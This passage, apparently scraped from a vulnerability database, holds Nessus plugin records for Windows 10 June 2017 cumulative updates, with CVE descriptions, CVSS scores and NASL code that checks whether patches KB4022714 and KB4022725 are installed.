(hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1703)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date: \"06_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4022725))\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:27:51", "description": "The remote Windows 10 version 1511 host is missing security update KB4022714. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V instruction emulation due to a failure to properly enforce privilege levels. An attacker on a guest operating system can exploit this to gain elevated privileges on the guest. Note that the host operating system is not vulnerable. (CVE-2017-0193)\n\n - Multiple security bypass vulnerabilities exist in Device Guard. A local attacker can exploit these, via a specially crafted script, to bypass the Device Guard Code Integrity policy and inject arbitrary code into a trusted PowerShell process. (CVE-2017-0216, CVE-2017-0218, CVE-2017-0219)\n\n - Multiple information disclosure vulnerabilities exist in Windows Uniscribe due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website or to open a specially crafted document, to disclose the contents of memory. (CVE-2017-0282, CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in Windows Uniscribe software due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted document, to execute arbitrary code in the context of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in the Windows GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website or open a specially crafted document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289, CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these, by convincing a user to open a specially crafted PDF file, to execute arbitrary code in the context of the current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in Microsoft Windows due to improper handling of cabinet files. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted cabinet file, to execute arbitrary code in the context of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in tdx.sys due to a failure to check the length of a buffer prior to copying memory to it. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the DCOM object in Helppane.exe, when configured to run as the interactive user, due to a failure to properly authenticate the client. An authenticated, remote attacker can exploit this, via a specially crafted application, to run arbitrary code in another user's session after that user has logged on to the same system using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper initialization of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462, CVE-2017-8485)\n\n - An information disclosure vulnerability exists in Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted PDF file, to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows due to improper handling of shortcuts. An unauthenticated, remote attacker can exploit this, by convincing a user to insert a removable drive containing a malicious shortcut and binary, to automatically execute arbitrary code in the context of the current user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit these, via a specially crafted application, to run processes in an elevated context. (CVE-2017-8465, CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper initialization of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose sensitive information. (CVE-2017-8470, CVE-2017-8471, CVE-2017-8473, CVE-2017-8474, CVE-2017-8475, CVE-2017-8476, CVE-2017-8477, CVE-2017-8478, CVE-2017-8479, CVE-2017-8480, CVE-2017-8481, CVE-2017-8482, CVE-2017-8483, CVE-2017-8484, CVE-2017-8489, CVE-2017-8490, CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially crafted application, to bypass Unified Extensible Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the Windows Secure Kernel Mode feature due to a failure to properly handle objects in memory. A local attacker can exploit this, via a specially crafted application, to bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - A denial of service vulnerability exists in Windows due to improper handling of kernel mode requests. An unauthenticated, remote attacker can exploit this, via a specially crafted kernel mode request, to cause the machine to stop responding or rebooting. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524, CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in Microsoft Edge due to a failure to properly apply the Same Origin Policy for HTML elements. An unauthenticated, remote attacker can exploit this, by convincing a user to follow a link, to load a page with malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the Windows font library due to improper handling of embedded fonts. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft document, to execute arbitrary code in the context of the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in Microsoft Edge due to a failure to properly enforce same-origin policies. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose information from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the JavaScript scripting engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8549)\n\n - An information disclosure vulnerability exists in the Windows Graphics component due to improper handling of objects in memory. An authenticated, remote attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the Windows Graphics component due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. An authenticated, remote attacker can exploit this, via a specially crafted application, to disclose the contents of memory. (CVE-2017-8554)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T00:00:00", "type": "nessus", "title": "KB4022714: Windows 10 Version 1511 June 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0193", "CVE-2017-0216", "CVE-2017-0218", "CVE-2017-0219", "CVE-2017-0282", "CVE-2017-0283", "CVE-2017-0284", "CVE-2017-0285", "CVE-2017-0287", "CVE-2017-0288", "CVE-2017-0289", "CVE-2017-0291", "CVE-2017-0292", "CVE-2017-0294", "CVE-2017-0296", "CVE-2017-0297", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0300", "CVE-2017-8460", "CVE-2017-8462", "CVE-2017-8464", "CVE-2017-8465", "CVE-2017-8466", "CVE-2017-8468", "CVE-2017-8470", "CVE-2017-8471", "CVE-2017-8473", "CVE-2017-8474", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8477", "CVE-2017-8478", "CVE-2017-8479", "CVE-2017-8480", "CVE-2017-8481", "CVE-2017-8482", "CVE-2017-8483", "CVE-2017-8484", "CVE-2017-8485", "CVE-2017-8489", "CVE-2017-8490", "CVE-2017-8491", "CVE-2017-8492", "CVE-2017-8493", "CVE-2017-8494", "CVE-2017-8515", "CVE-2017-8517", "CVE-2017-8518", "CVE-2017-8522", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8527", "CVE-2017-8530", "CVE-2017-8531", "CVE-2017-8532", "CVE-2017-8533", "CVE-2017-8543", "CVE-2017-8544", "CVE-2017-8547", "CVE-2017-8548", "CVE-2017-8549", "CVE-2017-8554", "CVE-2017-8575", "CVE-2017-8576", "CVE-2017-8579"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUN_4022714.NASL", "href": "https://www.tenable.com/plugins/nessus/100759", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100759);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2017-0193\",\n \"CVE-2017-0216\",\n \"CVE-2017-0218\",\n \"CVE-2017-0219\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8465\",\n \"CVE-2017-8466\",\n \"CVE-2017-8468\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8473\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n \"CVE-2017-8494\",\n \"CVE-2017-8515\",\n \"CVE-2017-8517\",\n \"CVE-2017-8518\",\n \"CVE-2017-8522\",\n \"CVE-2017-8523\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8530\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8548\",\n \"CVE-2017-8549\",\n \"CVE-2017-8554\",\n \"CVE-2017-8575\",\n \"CVE-2017-8576\",\n \"CVE-2017-8579\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98833,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98843,\n 98844,\n 98845,\n 98846,\n 98847,\n 98848,\n 98849,\n 98850,\n 98852,\n 98853,\n 98854,\n 98855,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98863,\n 98865,\n 98867,\n 98869,\n 98870,\n 98878,\n 98884,\n 98885,\n 98887,\n 98895,\n 98896,\n 98897,\n 98898,\n 98900,\n 98901,\n 98902,\n 98903,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98926,\n 98928,\n 98929,\n 98930,\n 98932,\n 98933,\n 98942,\n 98954,\n 98955,\n 99210,\n 99212,\n 99215\n );\n script_xref(name:\"MSKB\", value:\"4022714\");\n script_xref(name:\"MSFT\", value:\"MS17-4022714\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/14\");\n\n script_name(english:\"KB4022714: Windows 10 Version 1511 June 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1511 host is missing security update\nKB4022714. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. (CVE-2017-0216,\n CVE-2017-0218, CVE-2017-0219)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or rebooting. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/4022714/windows-10-update-kb4022714\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?46ed25c8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4022714 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-06';\nkb = make_list(\n '4022714' # 10 1151\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kb, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"06_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4022714)))\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:27:52", "description": "The remote Windows host is missing security update KB4022715. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple security bypass vulnerabilities exist in Device Guard. A local attacker can exploit these, via a specially crafted script, to bypass the Device Guard Code Integrity policy and inject arbitrary code into a trusted PowerShell process. (CVE-2017-0173, CVE-2017-0215, CVE-2017-0216, CVE-2017-0218, CVE-2017-0219)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V instruction emulation due to a failure to properly enforce privilege levels. An attacker on a guest operating system can exploit this to gain elevated privileges on the guest. Note that the host operating system is not vulnerable. (CVE-2017-0193)\n\n - Multiple information disclosure vulnerabilities exist in Windows Uniscribe due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website or open a specially crafted document, to disclose the contents of memory. (CVE-2017-0282, CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in Windows Uniscribe software due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted document, to execute arbitrary code in the context of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in the Windows GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website or open a specially crafted document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289, CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these, by convincing a user to open a specially crafted PDF file, to execute arbitrary code in the context of the current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in Microsoft Windows due to improper handling of cabinet files. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted cabinet file, to execute arbitrary code in the context of the current user. (CVE-2017-0294)\n\n - A flaw exists in Microsoft Windows due to incorrect permissions being set on folders inside the DEFAULT folder structure. An authenticated, remote attacker can exploit this, by logging in to the affected system before the user can log in, to modify the user's DEFAULT folder contents. (CVE-2017-0295)\n\n - An elevation of privilege vulnerability exists in tdx.sys due to a failure to check the length of a buffer prior to copying memory to it. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the DCOM object in Helppane.exe, when configured to run as the interactive user, due to a failure to properly authenticate the client. An authenticated, remote attacker can exploit this, via a specially crafted application, to run arbitrary code in another user's session after that user has logged on to the same system using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper initialization of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462, CVE-2017-8485)\n\n - An information disclosure vulnerability exists in Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted PDF file, to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows due to improper handling of shortcuts. An unauthenticated, remote attacker can exploit this, by convincing a user to insert a removable drive containing a malicious shortcut and binary, to automatically execute arbitrary code in the context of the current user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit these, via a specially crafted application, to run processes in an elevated context. (CVE-2017-8465, CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper initialization of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose sensitive information. (CVE-2017-8470, CVE-2017-8471, CVE-2017-8473, CVE-2017-8474, CVE-2017-8475, CVE-2017-8476, CVE-2017-8477, CVE-2017-8478, CVE-2017-8479, CVE-2017-8480, CVE-2017-8481, CVE-2017-8482, CVE-2017-8483, CVE-2017-8484, CVE-2017-8489, CVE-2017-8490, 